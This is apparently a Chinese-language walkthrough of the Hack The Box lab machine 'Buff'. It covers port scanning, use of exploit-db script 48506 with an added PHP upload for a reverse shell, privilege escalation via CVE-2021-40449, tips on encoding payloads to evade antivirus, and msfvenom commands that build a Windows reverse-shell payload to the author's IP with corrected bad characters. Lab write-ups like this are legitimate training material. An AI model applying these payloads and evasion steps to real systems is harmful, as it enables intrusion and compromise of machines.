难度:easy
初步端口扫描:
开了两个端口,7680没有什么信息,8080是web服务,进去看一下,在concat.php发现版本信息
searchsploit搜一下,发现payload,选用48506这个脚本
修改一下脚本,不用他给的交互式shell(太难用了),在写入的php文件中加入文件上传功能,弹回来个shell,用msf收一下
直接用multi/recon/local_exploit_suggester提权
利用cve_2021_40449可以提权成功
后续
有师傅跟我说打的时候发现有杀软:
因为我一开始直接用的meterpreter的payload,直接绕过了没有感觉,一种方式就是用meterpreter的payload,一种方式是用nc弹回来,第三种方式是对shell_reverse_tcp这个payload进行简单的免杀:
加个编码参数后就能传上去,没有免杀的payload如果通过web传上去机器会直接卡死
后续看了官方的wp,复现了一下发现官方给的wp还是有点小坑
首先用chisel把端口代理出来,官方的wp很详细,不多赘述,具体讲一下坑在哪
官方的命令是:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
这样子shell回不来,坏字符没处理干净,命令替换成
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python
这样生成的shellcode替换exp里的shellcode后可以正常使用
标签:reverse,shell,HTB,一下,tcp,wp,payload,buff
From: https://www.cnblogs.com/bfa-hawk/p/18457225